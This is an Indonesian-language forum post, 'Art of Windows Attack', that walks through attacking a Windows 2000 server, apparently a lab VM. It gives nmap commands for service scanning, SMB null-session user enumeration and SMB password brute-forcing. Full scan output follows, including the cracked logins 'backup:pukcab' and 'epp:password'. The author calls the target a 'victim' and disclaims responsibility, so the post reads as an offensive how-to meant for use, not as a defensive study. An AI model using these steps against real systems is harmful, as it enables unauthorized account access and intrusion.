New Posts


Art of Windows Attack
by peneter

Wednesday, 18 Jan 2012

Ok kita mulai aja dan perlu di ingat gw hanya menggunakan target yang victim, jadi apa pun resikonya gw gak nanggung, soalnya gw udah nanggung resikonya kemarin2,hahahha, jadi gw share aja dah.[0x01] scan dan userenum, di sini akan gw bahas bagaimana mendapatkan sebuah akses kedalam mesin target, tentunya target yang dimaksud adalah target yang bermesinkan atau berplatform windows. Yups, seperti judulnya yang diatas, langkah pertama adalah lakukan scanning terhadap mesin target, gunakan nmap untuk melakukan scanning, kenapa pake nmap gak yang lain sebab nmap banyak digunakan dan terbukti ampuh, dan apabila ada yang mau menggunakan scanner lain silahkan aja, gak ada yang larang.

 

kiddies@shellstr0m - nmap -sV 192.168.80.129

nah resultnya kayak gini :

        Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
	Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and
consistency reasons. set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too). Interesting ports on 192.168.80.129: Not shown: 990 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS webserver 5.0 135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe) 139/tcp open netbios-ssn 443/tcp open https? 445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe) 1026/tcp open msrpc Microsoft Windows RPC 1027/tcp open msrpc Microsoft Windows RPC 1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM 3372/tcp open msdtc? 1 service unrecognized despite returning data. If you know the service/version,
please submit the following
fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01") SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0 SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0 SF:x\x01"); MAC Address: 00:0C:29:CC:CF:46 (VMware) Service Info: OS: Windows Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds


Dari hasil scan tersebut, banyak sekali listing port yang terbuka dan kita bisa melihat server juga banyak menjalankan aplikasinya seperti, IIS,NetBios,SMB, dan lain2. Nah, kebetulannya OS dari si server adalah windows 2000 dari sini kita bisa melakukan beberapa exploitasi terhadap server dengan mengetahui beberapa port listing yang ada dari hasil scanning. Disini kita tau bahwa dari informasi yang ada, bahwa netbios dan SMB pada windows 2000 memiliki vuln “NULL session” dengan mengijinkan kita untuk melakukan enumarasi ke semua acc yang ada.
cara melakukan userenum :

kiddies@shellstr0m - nmap  --script=smb-enum-users 192.168.80.129

Hasil :
 Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
	Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too). Interesting ports on 192.168.80.129: Not shown: 990 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1433/tcp open ms-sql-s 3372/tcp open msdtc MAC Address: 00:0C:29:CC:CF:46 (VMware) Host script results: | smb-enum-users: |_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor,
SERVER\Guest, SERVER\IUSR_SERVER,
SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary,
SERVER\molly, SERVER\None, SERVER\TsInternetUser Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds


dari hasil diatas kita bisa tahu semua user dalam target system :

- Administrator
- Backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser

Untuk teknik lainnya silahkan cari sendiri ok. Untuk nge-brute pake nmap gunakan perintah ini :

kiddies@shellstr0m - nmap  --script=smb-brute 192.168.80.129

Hasilnya :

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
	Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too). Interesting ports on 192.168.80.129: Not shown: 990 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1433/tcp open ms-sql-s 3372/tcp open msdtc MAC Address: 00:0C:29:CC:CF:46 (VMware) Host script results: | smb-brute: | backup:pukcab => Login was successful |_ epp:password => Login was successful Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

done…alias selesai buat scanning dan mendapatkan usernya.